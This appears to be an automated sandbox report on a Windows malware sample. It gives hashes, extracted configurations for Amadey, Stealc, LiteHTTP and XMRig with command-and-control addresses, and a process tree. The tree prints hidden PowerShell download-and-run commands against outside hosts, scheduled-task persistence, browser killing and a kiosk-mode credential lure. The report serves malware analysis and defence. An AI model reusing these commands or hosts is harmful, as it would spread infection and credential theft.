Analysis

  • max time kernel
    134s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/03/2025, 20:59

General

  • Target

    3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe

  • Size

    938KB

  • MD5

    1fa9c173c6abaae5709ca4b88db07aa5

  • SHA1

    dc77a5b0aeede04510ad4604ff58af13fd377609

  • SHA256

    3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247

  • SHA512

    8bf7ea16e4ac88460842de1ab9abeeccb930d1bd309a8d06e2e33fab96cdd8a6f7a001dede7eedbe3511cba20e8799591e45a1a00bb484899bc255f3af811534

  • SSDEEP

    24576:OqDEvCTbMWu7rQYlBQcBiT6rprG8a09u:OTvC/MTQYxsWR7a09

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs
  • XMRig Miner payload 9 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file 24 IoCs
  • Uses browser remote debugging 2 TTPs 5 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 30 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 30 IoCs
  • Identifies Wine through registry keys 2 TTPs 15 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 47 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 53 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 57 IoCs
  • Suspicious use of FindShellTrayWindow 44 IoCs
  • Suspicious use of SendNotifyMessage 38 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:3452
    • C:\Users\Admin\AppData\Local\Temp\3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe
      "C:\Users\Admin\AppData\Local\Temp\3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:5868
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn 87tdHmaX0nr /tr "mshta C:\Users\Admin\AppData\Local\Temp\15M4G5FNd.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:6000
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn 87tdHmaX0nr /tr "mshta C:\Users\Admin\AppData\Local\Temp\15M4G5FNd.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:3600
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\15M4G5FNd.hta
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5036
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5572
          • C:\Users\Admin\AppData\Local\TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE
            "C:\Users\Admin\AppData\Local\TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:3996
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:4776
              • C:\Users\Admin\AppData\Local\Temp\10106470101\zY9sqWs.exe
                "C:\Users\Admin\AppData\Local\Temp\10106470101\zY9sqWs.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:5144
              • C:\Users\Admin\AppData\Local\Temp\10106670101\07f0341e03.exe
                "C:\Users\Admin\AppData\Local\Temp\10106670101\07f0341e03.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of WriteProcessMemory
                PID:3384
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c schtasks /create /tn DLKcfma5XZi /tr "mshta C:\Users\Admin\AppData\Local\Temp\TSx5M2Vv9.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2648
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /tn DLKcfma5XZi /tr "mshta C:\Users\Admin\AppData\Local\Temp\TSx5M2Vv9.hta" /sc minute /mo 25 /ru "Admin" /f
                    9⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:1580
                • C:\Windows\SysWOW64\mshta.exe
                  mshta C:\Users\Admin\AppData\Local\Temp\TSx5M2Vv9.hta
                  8⤵
                  • Checks computer location settings
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1644
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IM2IHBGUZCTJAIKMXNLLOE6RZTPIBKBA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                    9⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Downloads MZ/PE file
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:2352
                    • C:\Users\Admin\AppData\Local\TempIM2IHBGUZCTJAIKMXNLLOE6RZTPIBKBA.EXE
                      "C:\Users\Admin\AppData\Local\TempIM2IHBGUZCTJAIKMXNLLOE6RZTPIBKBA.EXE"
                      10⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3448
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10106680121\am_no.cmd" "
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:5840
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 2
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Delays execution with timeout.exe
                  PID:808
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:4320
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:6064
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3500
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:404
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2152
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5260
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn "4laqomaKl5j" /tr "mshta \"C:\Temp\kIHBRezOM.hta\"" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:3680
                • C:\Windows\SysWOW64\mshta.exe
                  mshta "C:\Temp\kIHBRezOM.hta"
                  8⤵
                  • Checks computer location settings
                  • System Location Discovery: System Language Discovery
                  PID:392
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                    9⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Downloads MZ/PE file
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3008
                    • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                      "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                      10⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:5812
              • C:\Users\Admin\AppData\Local\Temp\10106720101\8c5bb98819.exe
                "C:\Users\Admin\AppData\Local\Temp\10106720101\8c5bb98819.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2316
                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                  8⤵
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  PID:3640
              • C:\Users\Admin\AppData\Local\Temp\10106730101\96bcd9aa10.exe
                "C:\Users\Admin\AppData\Local\Temp\10106730101\96bcd9aa10.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:5740
                • C:\Users\Admin\AppData\Local\Temp\10106730101\96bcd9aa10.exe
                  "C:\Users\Admin\AppData\Local\Temp\10106730101\96bcd9aa10.exe"
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4168
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 800
                  8⤵
                  • Program crash
                  PID:860
              • C:\Users\Admin\AppData\Local\Temp\10106740101\e104531459.exe
                "C:\Users\Admin\AppData\Local\Temp\10106740101\e104531459.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4632
                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                  8⤵
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  PID:5164
              • C:\Users\Admin\AppData\Local\Temp\10106750101\aa693c20c2.exe
                "C:\Users\Admin\AppData\Local\Temp\10106750101\aa693c20c2.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:924
              • C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
                "C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                PID:3992
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\623F.tmp\6240.tmp\6241.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
                  8⤵
                    PID:6128
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
                      9⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3792
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
                        10⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops startup file
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5396
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\snvfop4q\snvfop4q.cmdline"
                          11⤵
                            PID:3172
                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA841.tmp" "c:\Users\Admin\AppData\Local\Temp\snvfop4q\CSC3056CCF9EC284DFABADFF3EE5513AB1.TMP"
                              12⤵
                                PID:4980
                    • C:\Users\Admin\AppData\Local\Temp\10106780101\eba65d1d30.exe
                      "C:\Users\Admin\AppData\Local\Temp\10106780101\eba65d1d30.exe"
                      7⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Downloads MZ/PE file
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:5244
                      • C:\Users\Admin\AppData\Local\Temp\H1BOWLMZY3FDIASGILNBDFYK150.exe
                        "C:\Users\Admin\AppData\Local\Temp\H1BOWLMZY3FDIASGILNBDFYK150.exe"
                        8⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5596
                    • C:\Users\Admin\AppData\Local\Temp\10106790101\994e6485c2.exe
                      "C:\Users\Admin\AppData\Local\Temp\10106790101\994e6485c2.exe"
                      7⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1856
                    • C:\Users\Admin\AppData\Local\Temp\10106800101\fcf3781934.exe
                      "C:\Users\Admin\AppData\Local\Temp\10106800101\fcf3781934.exe"
                      7⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:4328
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM firefox.exe /T
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4252
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM chrome.exe /T
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3088
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM msedge.exe /T
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5800
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM opera.exe /T
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:6044
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM brave.exe /T
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1976
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                        8⤵
                          PID:2352
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                            9⤵
                            • Checks processor information in registry
                            • Modifies registry class
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            • Suspicious use of SetWindowsHookEx
                            PID:3336
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2032 -parentBuildID 20240401114208 -prefsHandle 1948 -prefMapHandle 1940 -prefsLen 27434 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {60d597ce-11bd-4dd7-80eb-188a5e1853c2} 3336 "\\.\pipe\gecko-crash-server-pipe.3336" gpu
                              10⤵
                                PID:4248
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2460 -prefMapHandle 2448 -prefsLen 28354 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f8edf49b-fad6-427b-96be-90e7c47de8f6} 3336 "\\.\pipe\gecko-crash-server-pipe.3336" socket
                                10⤵
                                  PID:6048
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2920 -childID 1 -isForBrowser -prefsHandle 1596 -prefMapHandle 1440 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2117c321-039d-4b96-b8a3-14ebbdf303b4} 3336 "\\.\pipe\gecko-crash-server-pipe.3336" tab
                                  10⤵
                                    PID:4572
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4140 -childID 2 -isForBrowser -prefsHandle 4116 -prefMapHandle 4112 -prefsLen 32844 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {917576f9-9c00-47c8-a944-6dd694ab0d57} 3336 "\\.\pipe\gecko-crash-server-pipe.3336" tab
                                    10⤵
                                      PID:4816
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4808 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4800 -prefMapHandle 4796 -prefsLen 32844 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {80d2cd0c-b657-46d7-ba49-1413eaa238f5} 3336 "\\.\pipe\gecko-crash-server-pipe.3336" utility
                                      10⤵
                                      • Checks processor information in registry
                                      PID:6016
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5040 -childID 3 -isForBrowser -prefsHandle 5264 -prefMapHandle 4848 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2562196f-d00a-46ed-acb3-5c65bc1953e4} 3336 "\\.\pipe\gecko-crash-server-pipe.3336" tab
                                      10⤵
                                        PID:2432
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5420 -childID 4 -isForBrowser -prefsHandle 5424 -prefMapHandle 5428 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb16b92f-416d-4eb4-8ec2-7576b69309b7} 3336 "\\.\pipe\gecko-crash-server-pipe.3336" tab
                                        10⤵
                                          PID:1436
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5604 -childID 5 -isForBrowser -prefsHandle 5612 -prefMapHandle 4840 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {266a1e89-024f-448b-92bf-6cc8562f9c9e} 3336 "\\.\pipe\gecko-crash-server-pipe.3336" tab
                                          10⤵
                                            PID:5224
                                    • C:\Users\Admin\AppData\Local\Temp\10106810101\fdfd028b01.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10106810101\fdfd028b01.exe"
                                      7⤵
                                      • Modifies Windows Defender DisableAntiSpyware settings
                                      • Modifies Windows Defender Real-time Protection settings
                                      • Modifies Windows Defender TamperProtection settings
                                      • Modifies Windows Defender notification settings
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Windows security modification
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5996
                                    • C:\Windows\SysWOW64\cmd.exe
